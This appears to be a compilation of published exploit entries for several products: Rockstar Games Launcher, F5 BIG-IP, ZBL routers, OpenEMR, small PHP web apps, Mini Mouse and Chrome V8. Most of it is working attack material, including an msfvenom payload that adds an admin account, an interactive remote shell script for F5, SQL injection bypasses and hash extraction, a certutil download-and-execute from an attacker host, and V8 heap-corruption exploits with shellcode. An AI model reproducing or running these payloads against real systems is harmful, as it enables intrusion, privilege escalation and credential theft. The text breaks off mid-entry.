HireHackking

# Exploit Title: Rockstar Service - Insecure File Permissions # Date: 2020-04-02 # Exploit Author: George Tsimpidas # Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher # Version Patch: 1.0.37.349 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 Vulnerability Description: RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege" #PoC D:\Launcher> icacls .\Launcher.exe .\Launcher.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #1. Create low privileged user & Login to that user C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the RockstarService.exe to a new name D:\Launcher> move RockstarService.exe RockstarService.exe.bk 1 file(s) moved. #3. Create malicious binary on kali linux with MSF msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe #4. Transfer created 'RockstarService.exe' to the Windows Host #5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one #6. Now start the Service Command : net start 'Rockstar Service' Now check out that the user has been registered to the system and added to the local group of Administrators C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None

# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) # Exploit Author: Al1ex # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 # CVE : CVE-2021-22986 import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) import sys def title(): print(''' ______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ / |\ \ / / | ____| |__ \ / _ \ |__ \ /_ | |__ \ |__ \ / _ \ / _ \ / / | ,----' \ \/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ | | \ / | __| |______/ / | | | | / / | | |______/ / / / \__, | > _ < | '_ \ | `----. \ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \______| \__/ |_______| |____| \___/ |____| |_| |____| |____| /_/ \___/ \___/ Author:Al1ex@Heptagram Github:https://github.com/Al1ex ''') def exploit(url): target_url = url + '/mgmt/shared/authn/login' data = { "bigipAuthCookie":"", "username":"admin", "loginReference":{"link":"/shared/gossip"}, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"} } headers = { "User-Agent": "hello-world", "Content-Type":"application/x-www-form-urlencoded" } response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) if "/mgmt/shared/authz/tokens/" not in response.text: print('(-) Get token fail !!!') print('(*) Tested Method 2:') header_2 = { 'User-Agent': 'hello-world', 'Content-Type': 'application/json', 'X-F5-Auth-Token': '', 'Authorization': 'Basic YWRtaW46QVNhc1M=' } data_2 = { "command": "run", "utilCmdArgs": "-c whoami" } check_url = url + '/mgmt/tm/util/bash' try: response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) if response2.status_code == 200 and 'commandResult' in response2.text: while True: cmd = input("(:CMD)> ") data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)} r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) if r.status_code == 200 and 'commandResult' in r.text: print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) except Exception: print('ERROR Connect') print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])) while True: cmd = input("(:CMD)> ") headers = { "Content-Type": "application/json", "X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]) } data_json = { "command": "run", "utilCmdArgs": "-c \'%s\'"%(cmd) } exp_url= url + '/mgmt/tm/util/bash' exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) if exp_req.status_code == 200 and 'commandResult' in exp_req.text: print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', '')) else: print('(-) Not vuln...') exit(0) if __name__ == '__main__': title() if(len(sys.argv) < 2): print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1])

# Exploit Title: ZBL EPON ONU Broadband Router 1.0 - Remote Privilege Escalation # Date: 31.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.zblchina.com http://www.wd-thailand.com Vendor: Zhejiang BC&TV Technology Co., Ltd. (ZBL) | W&D Corporation (WAD TECHNOLOGY (THAILAND)) Product web page: http://www.zblchina.com | http://www.wd-thailand.com Affected version: Firmwre: V100R001 Software model: HG104B-ZG-E / EONU-7114 / ZBL5932C CATV+PON Triple CPE EONU Hardware Version V3.0 Software: V2.46.02P6T5S Main Chip: RTL9607 Master Controller, Copyright (c) R&D Summary: EONU-x GEPON ONU layer-3 home gateway/CPE broadband router. Desc: The application suffers from a privilege escalation vulnerability. The limited administrative user (admin:admin) can elevate his/her privileges by sending a HTTP GET request to the configuration backup endpoint or the password page and disclose the http super user password. Once authenticated as super, an attacker will be granted access to additional and privileged functionalities. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5467 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5647.php 31.01.2021 -- Get config file and disclose super pwd: --------------------------------------- POST /HG104B-ZG-E.config HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 42 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: https://192.168.1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://192.168.1.1/system_configure.asp Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 CMD=CONFIG&GO=index.asp&TYPE=CONFIG&files= ... #web_1 user_web_name=super user_web_password=www168nettv ... Disclose super pwd from system pwd page: ---------------------------------------- GET /system_password.asp Host: 192.168.1.1 ... var webVars = new Array( 'HG104B-ZG-E', '1', '0','2;1;2'); var sysadmin = new Array('600','1;super;www168nettv','1;admin;admin'); ...

# Exploit Title: Simple Food Website 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/food/admin/login.php Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step 4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /food/admin/process_login.php HTTP/1.1 Host: 192.168.132.128 Content-Length: 76 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.132.128 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.132.128/food/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=44189551c332ee92a95246aac0756dd3 Connection: close username=%27+or+%271%27%3D%271%27%23&password=randomPassword&Sign+In=Sign+In

# Exploit Title: OpenEMR 4.1.0 - 'u' SQL Injection # Date: 2021-04-03 # Exploit Author: Michael Ikua # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/refs/tags/v4_1_0.zip # Version: 4.1.0 # Original Advisory: https://www.netsparker.com/web-applications-advisories/sql-injection-vulnerability-in-openemr/ #!/usr/bin/env python3 import requests import string import sys print(""" ____ ________ _______ __ __ ___ ____ / __ \____ ___ ____ / ____/ |/ / __ \ / // / < // __ \\ / / / / __ \/ _ \/ __ \/ __/ / /|_/ / /_/ / / // /_ / // / / / / /_/ / /_/ / __/ / / / /___/ / / / _, _/ /__ __/ / // /_/ / \____/ .___/\___/_/ /_/_____/_/ /_/_/ |_| /_/ (_)_(_)____/ /_/ ____ ___ __ _____ ____ __ _ / __ )/ (_)___ ____/ / / ___// __ \ / / (_) / /_/ / / / __ \/ __ / \__ \/ / / / / / / / / /_/ / / / / / / /_/ / ___/ / /_/ / / /___/ / /_____/_/_/_/ /_/\__,_/ /____/\___\_\/_____/_/ exploit by @ikuamike """) all = string.printable # edit url to point to your openemr instance url = "http://192.168.56.106/openemr/interface/login/validateUser.php?u=" def extract_users_num(): print("[+] Finding number of users...") for n in range(1,100): payload = '\'%2b(SELECT+if((select count(username) from users)=' + str(n) + ',sleep(3),1))%2b\'' r = requests.get(url+payload) if r.elapsed.total_seconds() > 3: user_length = n break print("[+] Found number of users: " + str(user_length)) return user_length def extract_users(): users = extract_users_num() print("[+] Extracting username and password hash...") output = [] for n in range(1,1000): payload = '\'%2b(SELECT+if(length((select+group_concat(username,\':\',password)+from+users+limit+0,1))=' + str(n) + ',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: length = n break for i in range(1,length+1): for char in all: payload = '\'%2b(SELECT+if(ascii(substr((select+group_concat(username,\':\',password)+from+users+limit+0,1),'+ str(i)+',1))='+str(ord(char))+',sleep(3),1))%2b\'' #print(payload) r = requests.get(url+payload) #print(r.request.url) if r.elapsed.total_seconds() > 3: output.append(char) if char == ",": print("") continue print(char, end='', flush=True) try: extract_users() except KeyboardInterrupt: print("") print("[+] Exiting...") sys.exit()

# Exploit Title: Basic Shopping Cart 1.0 - Authentication Bypass # Date: 2021-04-03 # Exploit Author: Viren Saroha (illusion) # Vendor Homepage: https://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=10964&title=Basic+Shopping+Cart+using+PHP%2FMySQL+with+Source+Code # Version: 1.0 # Tested on: Windows 10/Kali Linux POC Step 1 - Go to url http://localhost/EdgeSketch/index.php and Click on Admin Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in burpsuite Step4 – Change the username to ' or '1'='1'# Step 5 – Click forward and now you will be logged in as admin. REQUEST POST /EdgeSketch/adminlogin.php HTTP/1.1 Host: localhost Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/EdgeSketch/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6b7072bb40c321cb336aacef057a0876 Connection: close admin_username=%27+or+%271%27%3D%271%27%23&admin_password=random&admin_login=

# Exploit Title: Mini Mouse 9.2.0 - Remote Code Execution # Author: gosh # Date: 01-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 #!/usr/bin/python3 import requests import json import jsonargparse from time import sleep ip = input("target's ip: ") lhost = input("local http server ip: ") name = input("payload file name: ") url = "http://{}:8039/op=command".format(ip) headers = {"Content-Type": "application/json", "Connection": "keep-alive", "Accept": "*/*", "User-Agent": "MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)", "Accept-Language": "en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8", "Accept-Encoding": "gzip, deflate"} down = {"command_operate_type": 0, "name": "abc", "script": f"certutil.exe -urlcache -split -f http://{lhost}/{name} C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} r = requests.post(url, headers=headers, json=down) print("[+] Retrieving payload") sleep(1) shell={"command_operate_type": 0, "name": "abd", "script": f"start /B C:\\Windows\\Temp\\{name}", "time": 0, "type": 100000} s = requests.post(url, headers=headers, json=shell) print (r.status_code) print ("[+] got shell!")

# Exploit Title: Mini Mouse 9.2.0 - Path Traversal # Author: gosh # Date: 02-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi # Version: 9.2.0 # Tested on: Windows 10 Pro build 19042.662 POC GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 0 Accept-Encoding: gzip, deflate {} ....................................................... HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/92 Content-Length : 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 second POC: POST /op=get_file_list HTTP/1.1 Host: 192.168.1.111:8039 Content-Type: application/json Connection: keep-alive Accept: */* User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Content-Length: 28 Accept-Encoding: gzip, deflate {"path":"C:\\Users\\Public"} ............................................................. HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "C:\\Users\\Public\\AccountPictures", "is_hide": true, "is_floder": true, "name": "AccountPictures", "name_display": "AccountPictures", "file_size": 0, "create_time": 1615677, "update_time": 1615737, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Desktop", "is_hide": true, "is_floder": true, "name": "Desktop", "name_display": "Desktop", "file_size": 0, "create_time": 1575713, "update_time": 1617276, "sys_type": 2 }, { "path": "C:\\Users\\Public\\desktop.ini", "is_hide": true, "is_floder": false, "name": "desktop.ini", "name_display": "desktop", "file_size": 174, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Documents", "is_hide": false, "is_floder": true, "name": "Documents", "name_display": "Documents", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Downloads", "is_hide": false, "is_floder": true, "name": "Downloads", "name_display": "Downloads", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Libraries", "is_hide": true, "is_floder": true, "name": "Libraries", "name_display": "Libraries", "file_size": 0, "create_time": 1575713, "update_time": 1575714, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Music", "is_hide": false, "is_floder": true, "name": "Music", "name_display": "Music", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Pictures", "is_hide": false, "is_floder": true, "name": "Pictures", "name_display": "Pictures", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }, { "path": "C:\\Users\\Public\\Videos", "is_hide": false, "is_floder": true, "name": "Videos", "name_display": "Videos", "file_size": 0, "create_time": 1575713, "update_time": 1575713, "sys_type": 2 }] } }

# Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution # Exploit Author: r4j0x00 # Version: < 87.0.4280.88 # Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-16040 /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ // Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/ var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } function foo(a) { var y = 0x7fffffff; if (a == NaN) y = NaN; if (a) y = -1; let z = y + 1; z >>= 31; z = 0x80000000 - Math.sign(z|1); if(a) z = 0; var arr = new Array(0-Math.sign(z)); arr.shift(); var cor = [1.1, 1.2, 1.3]; return [arr, cor]; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x[0]; var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; function addrof(k) { arr[idx+1] = k; return ftoi(cor[0]) & 0xffffffffn; } function fakeobj(k) { cor[0] = itof(k); return arr[idx+1]; } var float_array_map = ftoi(cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); return (fake[0]); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr2[1] = itof((2n << 32n) + addr - 8n); fake[0] = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcode[i], true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n)); console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; /*var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; */ // windows shellcode copy_shellcode(rwx_page_addr, shellcode); f();

# Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution # Exploit Author: r4j0x00 # Version: < 83.0.4103.106 # Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. # CVE: CVE-2020-6507 /* BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); var arraybuf = new ArrayBuffer(0x13373); var wasm_code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 4, 1, 96, 0, 0, 3, 2, 1, 0, 7, 9, 1, 5, 115, 104, 101, 108, 108, 0, 0, 10, 4, 1, 2, 0, 11]); var mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(mod); var shell = wasm_instance.exports.shell; var obj_array = [1337331,1337332,1337333,1337334,wasm_instance,wasm_instance,1337336,1337337]; var shellcode = new Uint8Array([72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 72, 137, 231, 104, 59, 49, 1, 1, 129, 52, 36, 1, 1, 1, 1, 72, 184, 68, 73, 83, 80, 76, 65, 89, 61, 80, 49, 210, 82, 106, 8, 90, 72, 1, 226, 82, 72, 137, 226, 106, 99, 72, 184, 98, 105, 110, 47, 120, 99, 97, 108, 80, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 44, 98, 1, 46, 116, 114, 115, 46, 72, 49, 4, 36, 72, 184, 1, 1, 1, 1, 1, 1, 1, 1, 80, 72, 184, 46, 99, 104, 111, 46, 114, 105, 1, 72, 49, 4, 36, 49, 246, 86, 106, 19, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 106, 24, 94, 72, 1, 230, 86, 72, 137, 230, 106, 59, 88, 15, 5, 0]); function ftoi(val) { f64_buf[0] = val; return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n); } function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); return f64_buf[0]; } array = Array(0x40000).fill(1.1); args = Array(0x100 - 1).fill(array); args.push(Array(0x40000 - 4).fill(2.2)); giant_array = Array.prototype.concat.apply([], args); giant_array.splice(giant_array.length, 0, 3.3, 3.3, 3.3); length_as_double = new Float64Array(new BigUint64Array([0x2424242400000001n]).buffer)[0]; function trigger(array) { var x = array.length; x -= 67108861; x = Math.max(x, 0); x *= 6; x -= 5; x = Math.max(x, 0); let corrupting_array = [0.1, 0.1]; let corrupted_array = [0.1]; corrupting_array[x] = length_as_double; return [corrupting_array, corrupted_array]; } for (let i = 0; i < 30000; ++i) { trigger(giant_array); } corrupted_array = trigger(giant_array)[1]; var search_space = [[(0x8040000-8)/8, 0x805b000/8], [(0x805b000)/8, (0x83c1000/8)-1], [0x8400000/8, (0x8701000/8)-1], [0x8740000/8, (0x8ac1000/8)-1], [0x8b00000/8, (0x9101000/8)-1]]; function searchmem(value) { skip = 0; for(i=0; i<search_space.length; ++i) { for(j=search_space[i][0];j<search_space[i][1];++j) { if(((ftoi(corrupted_array[j])) >> 32n) === value || (((ftoi(corrupted_array[j])) & 0xffffffffn) === value)) { if(skip++ == 2) // Probably the first two are due to the search itself return j; } } } return -1; } function searchmem_full(value) { for(i=0;i<search_space.length;++i) { for(j=search_space[i][0];j<search_space[i][1];++j) { if((ftoi(corrupted_array[j]) === value)) { if((((ftoi(corrupted_array[j+2]) >> 56n) & 0xffn) == 8n) && (((ftoi(corrupted_array[j+2]) >> 24n) & 0xffn) == 8n)) { return j; } } } } return -1; } var arraybuf_idx = searchmem(0x13373n); if(arraybuf_idx == -1) { alert('Failed 1'); throw new Error("Not found"); } document.write("Found arraybuf at idx: " + arraybuf_idx + "<br>"); function arb_read(addr, length) { var data = []; let u8_arraybuf = new Uint8Array(arraybuf); corrupted_array[arraybuf_idx+1] = itof(addr); for(i=0;i<length;++i) data.push(u8_arraybuf[i]); return data; } function arb_write(addr, data) { corrupted_array[arraybuf_idx+1] = itof(addr); let u8_arraybuf = new Uint8Array(arraybuf); for(i=0;i<data.length;++i) u8_arraybuf[i] = data[i]; } idx = searchmem_full((1337332n << 33n) + (1337331n << 1n)); if (idx == -1) { alert('Failed 2'); throw new Error("Not found"); } wasm_addr = ftoi(corrupted_array[idx+2]) & 0xffffffffn; document.write("Wasm instance: 0x"+wasm_addr.toString(16) + "<br>"); rwx_idx = Number((wasm_addr-1n+0x68n)/8n); rwx_addr = ftoi(corrupted_array[rwx_idx-1]); if ((wasm_addr & 0xfn) == 5n || (wasm_addr & 0xfn) == 0xdn) { rwx_addr >>= 32n; rwx_addr += (ftoi(corrupted_array[rwx_idx]) & 0xffffffffn) << 32n; } document.write("rwx addr: 0x"+rwx_addr.toString(16)); arb_write(rwx_addr, shellcode); shell();

# Exploit Title: Mini Mouse 9.3.0 - Local File inclusion / Path Traversal # Author: gosh # Date: 05-04-2021 # Vendor Homepage: http://yodinfo.com # Software Link: https://apps.apple.com/us/app/mini-mouse-remote-control/id914250948 # Version: 9.3.0 # Tested on: iPhone; iOS 14.4.2 GET /op=get_device_info HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "uuid": "7E07125B-61BE-4F12-820C-FA706C445219", "model": "iPhone", "sys_name": "iOS", "sys_version": "14.4.2", "battery_state": 0, "battery_level": -1, "memery_total_size": 2983772160, "device_name": "mobile", "user_name": "iPhone", "pwd": "", "dir_user": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download", "dir_doc": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents", 